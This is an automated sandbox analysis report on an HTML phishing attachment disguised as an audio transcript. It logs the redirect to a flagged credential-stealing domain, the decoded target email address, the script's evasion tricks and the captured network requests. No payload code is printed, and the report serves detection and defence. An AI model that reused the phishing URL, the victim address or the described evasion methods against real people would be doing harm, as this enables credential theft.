Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
audio.mp3_JasonhTranscript.html

Overview

General Information

Sample name:audio.mp3_JasonhTranscript.html
Analysis ID:1585584
MD5:384c2fdb33d506e73fcd84033f0e520b
SHA1:8e8bc1f4fce11bd1a3bc2aad676b2de7ff949812
SHA256:04c0219725fc77e62ab007336fd9700a25c7c215f1b46ff15e3fa3a6d280f3ec
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
Detected javascript redirector / loader
Suspicious Javascript code found in HTML file
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\audio.mp3_JasonhTranscript.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,8920122697455249808,12015628893217446941,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • rundll32.exe (PID: 3684 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://brh5.bughtswo.com/tgs0/#amFzb25oQHBhcmFkaWdtLWNvcnAuY29tSlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://brh5.bughtswo.com/tgs0/Avira URL Cloud: Label: phishing
Source: https://brh5.bughtswo.com/favicon.icoAvira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://brh5.bughtswo.com/tgs0/#amFzb25oQHBhcmFkaW... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. It appears to be a malicious phishing script that collects user credentials and sends them to an untrusted domain. The script also attempts to bypass form submission, indicating a clear intent to harm.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://brh5.bughtswo.com/tgs0/#amFzb25oQHBhcmFkaW... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of evading detection and potentially carrying out phishing or other malicious activities.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://brh5.bughtswo.com/tgs0/#amFzb25oQHBhcmFkaW... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. While some of the behaviors may be related to legitimate functionality like analytics or error reporting, the overall aggressive nature and use of obfuscation techniques raise significant concerns. Further review is warranted to determine the true intent of this script.
Source: audio.mp3_JasonhTranscript.htmlHTTP Parser: Low number of body elements: 0
Source: audio.mp3_JasonhTranscript.htmlHTTP Parser: .location
Source: audio.mp3_JasonhTranscript.htmlHTTP Parser: .location
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: audio.mp3_JasonhTranscript.htmlHTTP Parser: Base64 decoded: jasonh@paradigm-corp.com
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: audio.mp3_JasonhTranscript.htmlHTTP Parser: No favicon
Source: https://brh5.bughtswo.com/tgs0/#amFzb25oQHBhcmFkaWdtLWNvcnAuY29tHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718785501591639.YjIyZjZiODQtZDMyYy00N2JhLTg2OGQtNjVhMWE3NDRlYjQ3N2FhMWY0MzMtNWExOS00NDRmLWIyYzMtNjcxZjE4YjI2ZGVk&ui_locales=en-US&mkt=en-US&client-request-id=e1b894b9-a307-4e7d-a3de-f1f394f94bc9&state=qqSEdG7FtbFhq8L1SURO9O-hDWdkYsDKt830fkGYkSZTyS3TRHgmiYOUhE4MtQxVp2uoLf5L0MBN3_uF1YCqpYiPlJjes7BkRhXlM0wyBfuxbFECThl6_2QV6MyMmtL0Oi9zrCunntGK9_aeFN71mluzBJqSqG8qIQBMVlq_Gp48PuXfYtSD03sCuwXCszdRiiAU6A_YRhcdeM71Bc-mriwYNzCrjeLzk4mjLQv31DkxJjitDCbSxBf_EtHuUaOSJUxbA9OPPLp2IIhVVLnieg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: global trafficTCP traffic: 192.168.2.16:49706 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /tgs0/ HTTP/1.1Host: brh5.bughtswo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://brh5.bughtswo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
